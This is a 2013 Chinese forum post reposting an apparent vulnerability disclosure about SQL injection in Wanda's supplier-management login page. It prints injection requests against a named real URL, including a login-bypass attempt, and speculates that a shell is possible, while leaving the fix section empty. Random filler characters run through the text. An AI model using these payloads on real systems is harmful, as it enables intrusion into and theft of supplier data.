找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2739|回复: 0
打印 上一主题 下一主题

万达供应商系统SQL注射漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-24 20:16:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:万达某分站sql注入。敏感信息泄露。
, b2 y! D+ i4 [! Z% e8 g详细说明:" e) ~2 n# Y, G( Y, d: V& H8 @
万达scm系统登陆框sql注入。' [) j; H  k. N' V$ J4 T; D
6 K0 U, V% E! T6 V/ {4 |
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
; W1 Y5 n! F5 F
8 h0 g1 G6 b, I& A2 Z9 z
; x3 l/ s2 f0 M6 s500错误。
9 h( m4 x! T3 y* E& C% X
% E$ c5 b) l3 \9 v用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
* v3 o, a8 o  mhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
) }& T3 T5 |/ X: ^+ U: H" N8 Q" Q截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)
+ _7 u' K. V* f1 {5 c4 f: r经过分析,登陆验证的过程应该是:3 r6 [1 T, L( g. ^

* W0 x: J$ o) w. H( d9 U8 g3 v取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
, Y; S- S$ {3 j& }http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png/ j/ O* s  V1 W( p# `# B9 i

) t4 q; w$ W7 C, X0 Roracle数据库,存在注入点。@大连万达,你怎么看?
, v2 v& ^; ^" q6 {$ i  ?http://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png5 [, l- C6 A4 z* t* ~- C! @8 H
4 b! Z" Y9 e( V7 {/ i9 j) O
系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。6 O* c. W7 O4 R
漏洞证明:5 {7 x% I$ a% l
万达scm系统登陆框sql注入。9 R. Z4 n1 r( ?1 r  g. `
- m4 V0 ]( T7 D0 T) e, d3 X' d
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27) H4 F% Z9 [4 g

5 ?$ i4 X4 [1 F! B( [9 V& m6 V/ d3 f2 S; ]. w5 B0 ]
500错误。
0 `5 u# W& A: j$ v' `$ B% f( `1 [7 u  l, E- {
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
/ u) C! ~7 y+ p$ d& m" Z+ @http://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png7 K1 P4 }9 L! g& l2 \1 O* z

  T( h0 ]4 E: D  G% m3 L$ ^: z/ Y9 W  I6 L! h5 |
(截图有一点问题); P' `! R9 I. q1 W

- x4 s, T$ H- R' ]% X怎么饶都饶不过去;经过分析,登陆验证的过程应该是:. g2 ~6 I1 r- s4 z

2 D, S; \0 m" o3 _! [取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。) b2 R; n% t" Y% R# {6 G& F

6 I% Y1 ]3 u$ V( h, `" K' b7 u绕过:" A9 r' ?% y; k  Y. E2 b; R
http://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1* d0 s- A5 w! D9 ?& L

3 S0 P3 S  ]) u/ I( @8 ^
* S# E% h# q5 A% n3 l' h, r& Woracle数据库,存在注入点。@大连万达,你怎么看?6 l8 s2 R- p$ C
​系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。' r: Z$ k) [1 B) C

' c! s! [3 p- n3 G修复方案:( ]' G: R$ w+ D' t0 ]' k
。。。
4 F5 s$ G0 Y! o: e& U9 W: Y$ m3 U8 E

; }5 S( ^0 E4 O% N厂商已经确认
) h8 r  q& h. c7 k$ b' V. R
' d, i5 n, L' q8 ^[/td][/tr]5 c& h" _, t) n9 a  D4 G+ I$ R
[/table]
/ a4 U6 {6 h" ~9 p4 _& P5 a
6 \' _/ q' F+ W# i! w
' [+ X* s  ]3 Z/ G. D
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表